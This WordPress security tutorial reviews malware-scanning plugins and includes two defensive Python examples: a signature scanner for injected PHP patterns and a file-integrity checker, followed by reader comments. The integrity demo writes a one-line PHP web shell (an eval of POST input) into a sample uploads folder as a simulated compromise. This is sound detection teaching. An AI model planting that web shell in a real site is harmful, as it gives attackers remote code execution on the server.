
How to Scan Your WordPress Site for Potentially Malicious Code


Often we get asked by our users: is there a way to scan your WordPress site for potentially malicious code? The answer is yes, yes, and yes. There are both free and paid tools that scan a WordPress site for potentially malicious or unwanted code, and it is good practice to run such a checkup regularly rather than only after something already looks wrong. In this article, we will show you a few ways to scan your WordPress site for potentially malicious code.

Theme Authenticity Checker (TAC)

Theme Authenticity Checker is a free plugin that scans all of your WordPress theme files for potentially malicious or unwanted code.


Hackers often target theme files to inject hidden spam links or encoded (base64) code, so this plugin is a good way of checking for that. Keep in mind that it only covers theme files; plugins, WordPress core files and the database are outside its scope.

Exploit Scanner

Exploit Scanner is another free WordPress plugin that is much more robust than the Theme Authenticity Checker because it searches all the files and the database of your WordPress install. It looks for signs that your installation has been compromised.

Note: it does return a lot of false positives, so you have to know what you are doing to judge whether a flagged result is really malicious or is fine. It only reports; it does not remove anything, and a clean report does not prove the site is clean, because it can only find code that matches the patterns it knows about.
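What both plugins above do is, at bottom, a pattern search over the files of the install. The following is an added example (not code from Theme Authenticity Checker or Exploit Scanner) that scans a WordPress tree for the classic injection signatures and separates high-confidence hits from weak ones, which is where the false positives come from. The sample theme directory it builds, and the encoded string in it, are constructed for the example.

```python
"""Signature scan of a WordPress tree for injected code (added example).

Constructs a tiny fake theme so it runs offline. High-severity signatures
(eval of a decoded blob, preg_replace with the /e modifier, hidden iframes,
includes from a URL) have almost no legitimate use in a theme; low-severity
ones (a bare base64_decode, a long base64-looking blob) are common in
legitimate code and need a human look.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}

# (label, regex, severity)
SIGNATURES = [
    ("eval of decoded payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "high"),
    ("preg_replace with /e modifier",
     re.compile(r"\bpreg_replace\s*\(\s*['\"][^'\"]*[/#~|%]\w*e\w*['\"]", re.I),
     "high"),
    ("hidden iframe",
     re.compile(r"<iframe[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden"
                r"|width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b)", re.I),
     "high"),
    ("include from remote URL",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I),
     "high"),
    ("base64_decode call", re.compile(r"\bbase64_decode\s*\("), "low"),
    ("long base64-looking blob", re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"), "low"),
]


def scan_file(path: Path) -> list[dict]:
    """Return one finding per (line, signature) hit in a single file."""
    findings = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, regex, severity in SIGNATURES:
            if regex.search(line):
                findings.append({"file": str(path), "line": lineno,
                                 "signature": label, "severity": severity})
    return findings


def scan_tree(root: Path) -> list[dict]:
    """Walk an install (or just wp-content/themes) and collect all findings."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            findings.extend(scan_file(path))
    return findings


def triage(findings: list[dict]) -> dict[str, list[dict]]:
    """Split findings so the reviewer looks at the high-confidence ones first."""
    return {
        "high": [f for f in findings if f["severity"] == "high"],
        "low": [f for f in findings if f["severity"] == "low"],
    }


def build_sample_theme() -> Path:
    """Constructed sample: one injected footer and one benign functions file."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    theme = root / "wp-content" / "themes" / "sample"
    theme.mkdir(parents=True)
    # Injected: an encoded-eval backdoor (the blob decodes to: echo 'hello';)
    # plus a zero-size iframe, both typical of a tampered theme footer.
    (theme / "footer.php").write_text(
        "<?php\n"
        "// theme footer\n"
        "eval(base64_decode('ZWNobyAnaGVsbG8nOw=='));\n"
        "?>\n"
        '<iframe src="http://example.invalid/x" width="0" height="0"></iframe>\n'
    )
    # Benign: base64 used for an inline image is a textbook false positive.
    (theme / "functions.php").write_text(
        "<?php\n"
        "function sample_logo($icon_b64) {\n"
        "    return 'data:image/png;base64,' . base64_encode(file_get_contents(__DIR__ . '/logo.png'));\n"
        "}\n"
        "$icon = base64_decode($icon_b64);\n"
    )
    # Not scanned at all: stylesheets and images carry no executable PHP.
    (theme / "style.css").write_text("/* Theme Name: Sample */\n")
    return root


if __name__ == "__main__":
    for severity, hits in triage(scan_tree(build_sample_theme())).items():
        for hit in hits:
            print(f"[{severity}] {hit['file']}:{hit['line']} {hit['signature']}")
```

Run against a real install, the "high" list is what to open first; the "low" list is exactly the kind of output Exploit Scanner produces in volume, and deciding whether each hit is benign is the part no plugin does for you.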

Sucuri

Sucuri is, in our experience, the best WordPress security scanner out there. They have a basic free site scanner, which remotely checks the pages your site serves for known malware and blacklist warnings. Because it works from the outside, it only sees what your pages send to the scanner, not a backdoor sitting in a file that leaves the rendered page unchanged. The real value is in their paid version. See our article: 5 reasons why we use Sucuri to improve our WordPress security for a detailed overview. In short, once you install Sucuri, it monitors your website around the clock. It audits the activity on your site so that if something goes wrong you can trace where it went wrong. If something looks fishy, Sucuri blocks the IP. They also send you alerts if they notice something going on with your site. Last but not least, they offer a malware cleanup service which is included in the price of their service (no matter how big or small your site is).

We have their 5-site plan, which comes out to about $3 per site monthly. It makes sense to pay $3 per month to keep our websites safe.

By the way, this service is not just for beginners. Major publications like CNN, USAToday, PC World, TechCrunch, TheNextWeb, and others are recommending these guys. These guys know what they are doing, and we trust them with our website.
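The server-side monitoring described above comes down to knowing what your files looked like when the site was clean and noticing when they change, which also catches quiet edits (a link added to a footer, a PHP file dropped into the uploads folder) that no signature list would flag. The following is an added example, not Sucuri's code or WordPress's own: it records a SHA-256 baseline of an install, compares a later snapshot, and flags PHP under wp-content/uploads, a directory WordPress itself only uses for media. The sample tree and the simulated tampering are constructed for the example. For core files alone, WP-CLI's `wp core verify-checksums` does the same comparison against the checksums published by wordpress.org.

```python
"""Baseline-and-diff integrity check for a WordPress tree (added example).

Builds a constructed sample install, takes a baseline, simulates a compromise
and reports what changed. Assumes nothing about the real site other than
that it is a directory tree you can read.
"""
from __future__ import annotations

import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large uploads do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path, skip_dirs=("wp-content/cache",)) -> dict[str, str]:
    """Map relative POSIX path -> sha256 for every regular file under root."""
    baseline = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if any(rel.startswith(skip + "/") for skip in skip_dirs):
            continue
        baseline[rel] = sha256_file(path)
    return baseline


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Report files that appeared, disappeared or changed since the baseline."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def stray_php_in_uploads(paths) -> list[str]:
    """PHP under wp-content/uploads: WordPress stores only media there."""
    return sorted(p for p in paths
                  if p.startswith("wp-content/uploads/")
                  and p.lower().endswith((".php", ".phtml", ".php5")))


def save_baseline(baseline: dict[str, str], file: Path) -> None:
    """Store the baseline off the web root so an intruder cannot edit it."""
    file.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(file: Path) -> dict[str, str]:
    return json.loads(file.read_text())


def demo() -> dict[str, list[str]]:
    """Constructed scenario: clean baseline, then a footer edit and a dropped shell."""
    root = Path(tempfile.mkdtemp(prefix="wp-fim-"))
    (root / "wp-content" / "themes" / "sample").mkdir(parents=True)
    (root / "wp-content" / "uploads" / "2014" / "01").mkdir(parents=True)
    (root / "wp-config.php").write_text("<?php define('DB_NAME', 'wp');\n")
    (root / "wp-content/themes/sample/footer.php").write_text("<?php wp_footer(); ?>\n")
    (root / "wp-content/uploads/2014/01/photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 not really a jpeg")

    baseline_file = Path(tempfile.mkdtemp(prefix="wp-fim-baseline-")) / "baseline.json"
    save_baseline(build_baseline(root), baseline_file)

    # Simulated compromise: hidden spam link in the footer, PHP shell in uploads
    # named to look like a cache file.
    (root / "wp-content/themes/sample/footer.php").write_text(
        '<?php wp_footer(); ?>\n<div style="display:none"><a href="http://spam.invalid">x</a></div>\n')
    (root / "wp-content/uploads/2014/01/wp-cache.php").write_text("<?php @eval($_POST['c']); ?>\n")

    current = build_baseline(root)
    report = compare(load_baseline(baseline_file), current)
    report["stray_php"] = stray_php_in_uploads(current)
    return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The baseline must be taken from a state you trust (a fresh install plus your vetted theme and plugins) and stored where the web server cannot write, otherwise the attacker simply re-baselines after the change. Legitimate updates will show up as modifications too; re-baseline right after each one so the report stays short enough to read.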


Editorial Staff at WPBeginner is a team of WordPress lovers led by Syed Balkhi. Page maintained by Syed Balkhi.

  • bernard collin

    I had 2 websites compromised, with the front page of one saying "hack by mitzy" and the other one showing a display of Viagra and medic offers.
    I put them both in the Sucuri scanner; both came back perfectly clear.
    I wrote to Sucuri to let them know; they denied the fact. I told them to check my websites, they are hacked, and since they are only personal WP blogs I did not care, so I suggested leaving them hacked until they had found out why they could not see that they were hacked.
    They never replied to me, so after 4 days I was asked by my ISP to clean or remove my sites.

  • Marc

    Keith – Wordfence is easy to set up. It won't prevent attacks, but it makes it easier to clean them up and it can catch them pretty quickly. It is a default plugin for any site I build (which I do on a hobby basis rather than a professional one). I'm now looking at the other plugins Lisa suggested. There are a lot of Wordfence Firewall plugins, and the default one isn't for the current version of WP.

  • Muhammad Khalil Janjua

    Thanks, dear, you just saved my WordPress. Millions of blessings.

  • Mike Lund

    I WORRY that a plugin that ‘appears to offer protection’ could be a virus.

    How do we know who to trust?

    Some ‘recommended’ plugins have 3 reviews (and one was by a cat)!

    • WPBeginner Support

      There are several ways to find out whether a plugin is trustworthy or not. You can do a simple Google search to see what others are saying about a plugin. You can click on the support tab of the plugin page to see what users are saying. The number of downloads is also a good indicator of a plugin's reliability. If you are still unsure, then your safest bet is Sucuri. We use it on all our websites.

  • gmornob

    Thanks for sharing WordPress security tips. I agree with LISA CASSON =D because for whoever has many WP sites, that is costly.

  • Wendy Morelli

    Another vote for Wordfence!

  • JaY Srivastava

    First of all, lemme thank you for this article; it helped me a lot, as my site had had some malicious code for a long time and I was having trouble with it.

    Secondly thanks to people above for posting some more tools and links.

  • Michael Patrick McCarty

    Thank you so much for this information. I had suspected that I had picked up some malware, and I was beginning to lose some sleep over it. I installed some of your recommended plugins and discovered that I was fine. I don’t know how else I would have found the info I needed. Good to go. Write on!

  • zimbrul

    A few months ago I was reading a quite comprehensive article about using FREE WordPress themes and the malicious code they can have within them.
    TAC is an excellent plugin and I use it every time I experiment with free themes. Many of them have base64 code, and most of the time this will link your site to some not-so-techie type of sites.

  • Lisa Casson

    Scanning your website is a small step in securing WP sites. I’ve learnt that the hard way. It’s more useful if you can stop malicious code getting onto your site in the first place.

    We used to get hacked all the time until I started using these 3 handy plugins:
    Wordfence
    WordPress Firewall
    Block Bad Queries

    Haven’t been hacked since (touch wood). Scanning your current site is important, but it’s just not any good at securing your site long term.

    • Editorial Staff

      We entirely agree with your statement that scanning is a small step. However if you look at the last option we suggested (Sucuri), it is essentially all 3 plugins you suggested (combined into one and then some more).

      • Lisa Casson

        Except it’s not free :) For me who has 50+ WP websites, it’s not even close to affordable. It’s great if you have one website, but I need a ‘bulk’ solution.

        • Editorial Staff

          Yes, you get what you pay for. Not sure what your definition of affordable is, but to use Sucuri for 50 websites, it comes down to $1.8 per website monthly. Assuming you are making a lot more than that from all of your websites, it's a worthwhile investment. At least that is what we learnt from our experience. An example of this would be: self-insurance vs. going with an insurance company (that will cover everything). Pros and cons to both.

          You can save the money in your piggy bank and hope that you never get hacked. You take all the precautions necessary that decrease your chances of getting hacked. If you don't get hacked, then yes, you saved a lot of money. Say you do get hacked across your 50 websites; you not only have to pay someone to clean it up, but you also lose users and revenue during the time you were hacked. The total bill would be a lot higher vs. if you have Sucuri, where you know you are in safe hands. A similar argument can be made: what if I use Sucuri and never get hacked? I lost all that money. Well, Sucuri is actively helping you keep your site safe, and if something goes wrong during their watch, they will fix it for no additional cost. We'd rather be safe than sorry.

          We have seen hacks that will not trigger most malware scanners and firewalls. The changes a hacker might make would be hard to detect. Some hacks are very sneaky and not obvious at all. For example, changing canonical URLs of some of your popular articles. Adding links in your older articles. How many folks regularly check all of their older posts? This can happen if you have a plugin that may have a vulnerability. Or another script on the same server that can be infected. Just a few months ago, we found a hack like this spread across numerous popular sites, and their webmasters had no clue. Won't name any of those companies, but they are fairly well-known in the webmaster world. All were losing long-tail search traffic because their articles were suddenly disappearing from search. Instead, another site with duplicate content was ranking really high. Everyone was thinking that it was some Google penalty. Turned out, the canonical URLs on those pages were changed to this spam site that was ranking high instead.

          Services like Sucuri help monitor that and alert you right away because Sucuri has server-side scanning built in. More importantly, they will help you fix it along with finding and closing the loophole that exists.

        • Lisa Casson

          Well firstly, my clients do not pay me to secure their websites – I just add a bit of security because I know the vulnerabilities in WordPress. Also, it’s easy if you look at the monthly cost, but the reality is, I would need to fork out $1450 in one go, to secure 50 websites. I keep regular backups of my websites, and we revert when sites are compromised, and it works well enough for me.

          I can’t comment on the large sites with the problem you mentioned because I have much smaller websites, and often websites without blogs.

          I have nothing against Sucuri, but it’s just not an option for me; that was all I was trying to say.

    • maurizio

      I would add wpscan (http://wpscan.org/) to your list.

      IMO security can't rely only on plugins.
      There are some good practices that can be applied without a plugin: strong passwords, login protection, a file permission policy…

      Remember that each plugin can create overhead…

    • Keith Davis

      Hi Lisa
      Not heard of Wordfence, but it gets a 5 star rating over on WordPress.org.
      Is it difficult to set up?

      This might be a plugin that I’ll add to my security.

      Editorial Staff – what happened to the comments system you were using?
      It’s all changed.

    • bernard collin

      Thanks Lisa,

      I like the look of what these plugins do. I will install them on my websites, and I agree with you, Sucuri is too expensive and probably not doing what these ones are doing anyway.